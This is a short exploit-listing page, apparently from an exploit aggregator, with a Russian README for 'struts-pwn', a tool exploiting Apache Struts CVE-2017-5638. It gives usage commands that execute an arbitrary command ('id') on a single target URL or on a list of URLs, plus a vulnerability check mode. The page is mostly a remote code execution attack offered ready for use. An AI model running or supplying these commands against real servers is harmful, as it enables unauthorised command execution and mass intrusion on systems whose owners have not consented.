Exploit for struts-pwn
Exploit Code
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MAZEN160-STRUTS-PWN
# _struts-pwn_
### Эксплойт для Apache Struts CVE-2017-5638
# **Использование**
## Тестирование одного URL.
`python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'`
## Тестирование списка URL.
`python struts-pwn.py --list 'urls.txt' -c 'id'`
## Проверка существования уязвимости для одного URL.
`python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'`